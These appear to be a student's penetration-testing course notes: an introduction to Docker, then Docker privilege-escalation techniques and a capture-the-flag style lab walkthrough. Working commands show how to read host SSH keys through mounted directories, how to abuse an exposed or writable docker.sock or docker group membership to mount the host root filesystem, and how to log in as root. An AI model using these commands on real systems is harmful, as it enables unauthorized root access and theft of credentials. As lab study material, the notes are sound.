# Intro
- Docker is an open-source tool that provides a portable and consistent runtime environment for software applications
- Docker uses containers: isolated environments in user space that run at the OS level and share the filesystem and system resources
- One advantage of containerization is that it consumes significantly fewer resources than a traditional server or VM
- The Docker architecture uses a client-server model with two components:
- Docker client: acts as our interface for issuing commands and interacting with the Docker ecosystem
- Docker daemon: responsible for executing commands and managing containers
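- A quick way to see this split in practice is `docker version`, which reports the client and the daemon separately (a minimal sketch; exact fields and versions vary by install):
```bash
# Reports the Docker client and the Docker daemon (server) as separate components
docker version
# Client:
#  Version:      <client version>
#  API version:  <API version>
# <SNIP>
# Server:
#  Engine:
#   Version:     <daemon version>
# <SNIP>
```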
## Docker Daemon
- The `Docker Daemon` (or Docker server) is a critical part of the Docker ecosystem that plays a pivotal role in container management and orchestration
- The Docker Daemon is the powerhouse of the Docker ecosystem with several key responsibilities:
- running Docker containers
- interacting with Docker containers
- managing Docker containers on the host system
- The Docker Daemon handles the core containerization functionality, coordinating the creation, execution, and monitoring of Docker containers while maintaining their isolation from the host and from other containers
- This isolation ensures that containers operate independently, with their own file systems, processes, and network interfaces
- Furthermore, it handles Docker image management, such as pulling images from registries (e.g., [Docker Hub](https://hub.docker.com/) or private repos) and storing them locally
- These images serve as the building blocks for creating containers
- The Docker Daemon also facilitates container networking by creating virtual networks and managing network interfaces
- It enables containers to communicate with each other and the outside world through network ports, IP addresses, and DNS resolution
- When we interact with Docker, we issue commands through the `Docker Client`, which serves as our primary interface and communicates with the Docker Daemon through a `RESTful API` or a `Unix socket`
- Through the client, we can create, start, stop, manage, and remove containers, as well as search for and download Docker images
- Another client for Docker is `Docker Compose`
- Docker Compose is a tool that simplifies the orchestration of multiple Docker containers as a single application
- This allows us to define our application's multi-container architecture using a declarative `YAML` (`.yaml`/`.yml`) file
- With it, we can specify the services comprising our application, their dependencies, and their configs
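- As a minimal sketch (the service names, images, and ports below are made up for illustration), a compose file plus the commands to bring the stack up could look like this (older installs use the standalone `docker-compose` binary instead of the `docker compose` plugin):
```bash
# Hypothetical docker-compose.yml describing a two-service application
cat > docker-compose.yml << 'EOF'
services:
  web:
    image: nginx:latest
    ports:
      - "8080:80"
    depends_on:
      - db
  db:
    image: mysql:8
    environment:
      MYSQL_ROOT_PASSWORD: example
EOF

# Start every service in the background, then list their status
docker compose up -d
docker compose ps
```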
## Docker Images and Containers
- A Docker `image` is essentially a blueprint or a template for creating containers
- It encapsulates everything needed to run an application, including the application's code, dependencies, libraries, and configuration
- An `image` is a self-contained, read-only package that ensures consistency and reproducibility across different environments
- We can create images using a text file called a `Dockerfile`, which defines the steps and instructions for building the image
- A Docker `container`, in turn, is an instance of a Docker `image`
- The container is a lightweight, isolated, and executable environment that runs applications
- When we launch a container, it is created from a specific image, and the container inherits all the properties and configurations defined in that image
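- For illustration (the image name and Dockerfile contents are hypothetical), building an image from a `Dockerfile` and then launching a container from it could look like this:
```bash
# Hypothetical Dockerfile: a base image, one dependency, and a default command
cat > Dockerfile << 'EOF'
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y curl
CMD ["/bin/bash"]
EOF

# Build the image (the blueprint), then run a container (an instance of it)
docker build -t my-app:latest .
docker run --rm -it my-app:latest
```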
# Docker Privesc
## Docker Shared Dirs
- When using Docker, shared directories (volume mounts) can bridge the gap between the host system and the container's fs
- When we gain access to a Docker container and enumerate it locally, we might find additional (non-standard) directories in the container's filesystem
- Below is an example where we are able to read an `id_rsa` key in a user's home directory shared from the host
```shell-session
root@container:~$ cd /hostsystem/home/cry0l1t3
root@container:/hostsystem/home/cry0l1t3$ ls -l
-rw------- 1 cry0l1t3 cry0l1t3 12559 Jun 30 15:09 .bash_history
-rw-r--r-- 1 cry0l1t3 cry0l1t3 220 Jun 30 15:09 .bash_logout
-rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Jun 30 15:09 .bashrc
drwxr-x--- 10 cry0l1t3 cry0l1t3 4096 Jun 30 15:09 .ssh
root@container:/hostsystem/home/cry0l1t3$ cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
<SNIP>
```
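- Such a directory typically exists because the container was started with a bind mount from the host; a hypothetical example of how an administrator might have created it (image name and mounted path are assumptions):
```bash
# Run on the host: bind-mounts the host's /home into the container under /hostsystem/home
docker run -d -v /home:/hostsystem/home some_image
```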
## Accessible Docker Socket
- A Docker socket or Docker daemon socket is a special file that allows us and processes to communicate with the Docker daemon
- This communication occurs either through a Unix socket or a network socket, depending on the configuration of our Docker setup
- The Docker socket acts as a bridge, facilitating communication between the Docker client and the Docker daemon
- When we issue a command through the Docker CLI, the Docker client sends the command to the Docker socket, and the Docker daemon, in turn, processes the command and carries out the requested actions
- Docker sockets require appropriate permissions to ensure secure communication and prevent unauthorized access
- Access to the Docker socket is typically restricted to specific users or user groups, ensuring that only trusted individuals can issue commands and interact with the Docker daemon
- By exposing the Docker socket over a network interface, we can remotely manage Docker hosts, issue commands, and control containers and other resources
- This remote API access expands the possibilities for distributed Docker setups and remote management scenarios
- In addition, depending on the configuration, there are many places where files belonging to automated processes or scheduled tasks can be stored
- Those files can contain very useful information that we can use to escape the Docker container
- First, enum `docker.sock` from within the container
```bash
htb-student@container:~/app$ ls -al
total 8
drwxr-xr-x 1 htb-student htb-student 4096 Jun 30 15:12 .
drwxr-xr-x 1 root root 4096 Jun 30 15:12 ..
srw-rw---- 1 root root 0 Jun 30 15:27 docker.sock
```
- Now, use the `docker` binary from within the container to interact with the socket and enumerate what docker containers are already running
- If the `docker` binary is not installed in the container, we can download it [here](https://master.dockerproject.org/linux/x86_64/docker) and upload it to the container
```bash
htb-student@container:/tmp$ wget https://<parrot-os>:443/docker -O docker
htb-student@container:/tmp$ chmod +x docker
htb-student@container:/tmp$ ls -l
-rwxr-xr-x 1 htb-student htb-student 0 Jun 30 15:27 docker
htb-student@container:~/tmp$ /tmp/docker -H unix:///app/docker.sock ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
3fe8a4782311 main_app "/docker-entry.s..." 3 days ago Up 12 minutes 443/tcp app
```
- Next, we can create our own Docker container that maps the host's root directory (`/`) to the `/hostsystem` directory inside the new container
- With this, we will get full access to the host system
- Therefore, we must map these directories accordingly and use the `main_app` Docker image
```bash
htb-student@container:/app$ /tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app
htb-student@container:~/app$ /tmp/docker -H unix:///app/docker.sock ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
7ae3bcc818af main_app "/docker-entry.s..." 12 seconds ago Up 8 seconds 443/tcp app
3fe8a4782311 main_app "/docker-entry.s..." 3 days ago Up 17 minutes 443/tcp app
<SNIP>
```
- Finally, we can log in to the new privileged Docker container with the ID `7ae3bcc818af` and navigate to the `/hostsystem` directory
```bash
htb-student@container:/app$ /tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash
root@7ae3bcc818af:~# cat /hostsystem/root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
<SNIP>
```
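- With the host's root SSH key recovered, a natural follow-up (assuming the host runs SSH and permits key-based root login) is to authenticate to it directly from our attack machine:
```bash
# Save the recovered key locally, restrict its permissions, and log in as root on the host
chmod 600 id_rsa
ssh -i id_rsa root@<host-ip>
```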
## Docker Group
- To gain root privs through Docker, the user we are logged in with must be in the `docker` group
- This group access allows the current user to use and control the Docker daemon
- Enum group membership with the `id` command; a full escalation sketch follows the image listing below
- Alternatively to the above, Docker may have SUID set, or we are in the Sudoers file, which permits us to run `docker` as root
- All three options allow us to work with Docker to escalate our privileges
- Most hosts have a direct internet connection because the base images and containers must be downloaded
- Nonetheless, many hosts may be disconnected from the internet at night and outside working hours for security reasons
- However, if such a host sits in a network segment that other traffic (for example, to a web server) must pass through, it can still be reached
- To see which images exist and which we can access, issue the below command:
```bash
docker image ls
```
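- If `id` confirms membership in the `docker` group, a minimal escalation sketch (usernames, group IDs, and the `ubuntu` image are assumptions) looks like this:
```bash
# Confirm that our user is in the docker group (IDs shown are just examples)
docker-user@nix02:~$ id
uid=1000(docker-user) gid=1000(docker-user) groups=1000(docker-user),998(docker)

# Mount the host's root filesystem into a throwaway container and chroot into it as root
docker-user@nix02:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
root@<container-id>:/# cat /root/.ssh/id_rsa
```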
## Writeable Docker Socket
- The Docker socket is usually located at `/var/run/docker.sock` and, by default, is writable only by root and members of the `docker` group
- If we are acting as a user who is not in either of those groups but the socket is nevertheless writable, we can still use it to escalate our privileges
```bash
docker-user@nix02:~$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash
root@ubuntu:~# ls -l
```
---
# Exercise
- `ping` test ![[images/Pasted image 20260208203537.png]]
- `nmap` scans ![[images/Pasted image 20260208203613.png]]
- `ssh` into box with given creds ![[images/Pasted image 20260208203702.png]]
- light internal enum ![[images/Pasted image 20260208203735.png]]
- we are a member of the `docker` group
- enum available docker images ![[images/Pasted image 20260208203925.png]]
- simply run an `ubuntu` container with the host's root fs mounted, gaining access to the full local system fs with the command below
```bash
docker run -v /:/mnt -it ubuntu
```
![[images/Pasted image 20260208204124.png]]
- navigate into `/mnt` dir for local system fs
- check `/mnt/root` for flag > there it is ![[images/Pasted image 20260208204312.png]]
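- For reference, the steps behind the screenshots roughly correspond to the following commands (target address, credentials, and flag filename are placeholders):
```bash
# From the attack machine: connectivity check, service scan, and SSH with the provided credentials
ping -c 4 <target-ip>
nmap -sC -sV <target-ip>
ssh <user>@<target-ip>

# On the target: confirm docker group membership and list the available images
id
docker image ls

# Mount the host's root filesystem into an Ubuntu container, then read the flag from inside it
docker run -v /:/mnt -it ubuntu
ls /mnt/root
cat /mnt/root/<flag-file>
```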